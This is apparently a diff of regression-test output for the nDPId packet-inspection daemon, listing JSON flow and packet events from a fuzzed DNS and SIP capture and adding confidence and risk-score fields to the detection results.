 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470814334,"flow_last_seen":1120470817390,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470908872,"flow_last_seen":1120470908872,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"128.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00657{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470899859,"flow_last_seen":1120470899861,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470899859,"flow_last_seen":1120470899861,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470900860,"flow_last_seen":1120470904866,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00599{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899862,"flow_last_seen":1120470899862,"flow_idle_time":180000,"flow_min_l4_payload_len":1076,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":1076,"midstream":0,"ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":17860,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899865,"flow_last_seen":1120470899865,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.170.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1120471001245,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120471001245,"pkt":"ADBUADRWAODtAW69CABFAABEbDoAAIARSxvAqAECwKgBAQsGADUAMBixDAgAAAABEAAAAAAAATEBMAEwAzHvNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.1?7.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.1?7.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00432{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":638,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"ts_msec":1120471001246,"pkt":"AODtAW4lcwBUADRWCABFqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":638,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1120471001263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1120471001263,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"ts_msec":1120471001263,"pkt":"ADBUADRWAODtAW69CABFAAHsbDsAAIARFQbAqAEC1OohIxPEE8QB2K3LUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wODg4NjAxNi00NGIxNGZlMzE5Mi4xNjguMS4yO3Jwb3J0DQpGcm9tOiA8c2lwOjM1MTA0NzIzQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz04Nzk3MWENClRvOiA8c2lwOjM1MTA0NzIzQHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlEOiAyOTg1ODFHNy00NjViMDc1MkAyOTg1ODA1MS00NjViMDdiMnMKQ29udGFjdDogcGVsIDxzaXA6MzUxMDQ3MjNAMTkyLjE2OC4xLjI6NTA2MDtsaW5lPTdkMzY1NThmMzEzNjcwNTE+O2V4cGlyZXM9MTIwMDtxBDAuNTAwDQpFeHBpcmVzOiAxMjAwDQpDU2VxOiA1IFJFR0lTVEVSDQpD\/G50ZW50LUxlbmd0aDogMA0KTWF4LUZvcndhYmRzOiA3MA0KVXNlci1BZ2VudDoiTmVybyBTSVBQUyBJUCBQaG9uZSBWZXJzaW9uIDIuOC41MS4xNg0KDQo="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1120471001263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1120471001263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00988{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":640,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":522,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":522,"pkt_l4_len":0,"ts_msec":1120471001405,"pkt":"AODtAW69ADBUADRWCABFAEH8AABAADcRijHU8iEjwKgBAhPEE8QB6DHXU0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiAyOTg1ODE0N4M0NjViMDc1MkAyMTg1ODA1MS00NjViMDdiMg0KQ1MxcTogNSBSRUdJU1RFXw0KRnJvbTogWnNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9ODc5NzFhDQpUbzpqPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MDAtMDQwNzQtMTcwMWJhYzktMWRhYTBiNGM1DQpWaWE6IFNJJXMALjAvVURQIDE5Mi4xNjguMS4yO3JlY2VpdmVkPTgwLjIzMC4yMTkuNzA7cnBvcnQ9NTA2MDticmFuY2g9ejloRzRiS25wODg4NjAxNi00NGIxNGZlMzE5Mi4xNjguMS4yDQpXV1ctQXV0aGVudGljYXRlOiBEaWdlc3QgcmVhbG09InNpcC5jeWJlcmNpdHkuZGsiLG5vbmNlPSIxNzAxYmFiZDJhZDY3JXMANWU2ZDZiZjE1NDQyYSVzACxvcGFxdWU9IjE3MDFhMTM1MWY3MDc5NSIsc3RhbGU9ZmFsc2UsYWxnb3JpdGhtPU1ENQ0KQ29udGVuLy1MZW5ndGg6IDANCg0K"}
 00200{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":640,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":488}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001714,"flow_last_seen":1120471001714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471001714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1120471001714,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120471001714,"pkt":"ADBUADRWAODtAW69CABFAABIbDwAAIARSxXAqAECwKgBAQsHADUANKe0ggkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001714,"flow_last_seen":1120471001714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471001714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001714,"flow_last_seen":1120471001714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471001714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":1120471002706,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120471002706,"pkt":"ADBUADRWAODtAW69CABFAABIbD8gAIARSxTAqAECwKgBAQsHADUANKe0gjgBAAABAAAAAAAABF9zaXAEXXVkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":643,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120471004709,"pkt":"ALlUADRWAODtAW69CABFAABIbD4Au4ARSxNYqAECwKgBAQsHADUANKe0ggkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":643,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":3,"flow_last_seen":1120471006712,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120471006712,"pkt":"ADBUADRWAODtAW69CABFAABIbEcAAIARSwrAqAECwKgBAQsHADUANKe0ggkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAApAAE="}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":644,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120471001714,"flow_last_seen":1120471006712,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471006712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":41,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471001714,"flow_last_seen":1120471010718,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":644,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120471001714,"flow_last_seen":1120471006712,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471006712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":41,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471001714,"flow_last_seen":1120471010718,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470834515,"flow_last_seen":1120470834515,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":18162,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916873,"flow_last_seen":1120470916873,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2811,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00658{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00588{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470924263,"flow_last_seen":1120470924263,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":905,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471018720,"flow_last_seen":1120471018720,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1120471018720,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120471018720,"pkt":"ADBUADRWAODtAW69CABFAABEbEkAAIARSwzAqAECwKgBAQsIADUAMBesDQsAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
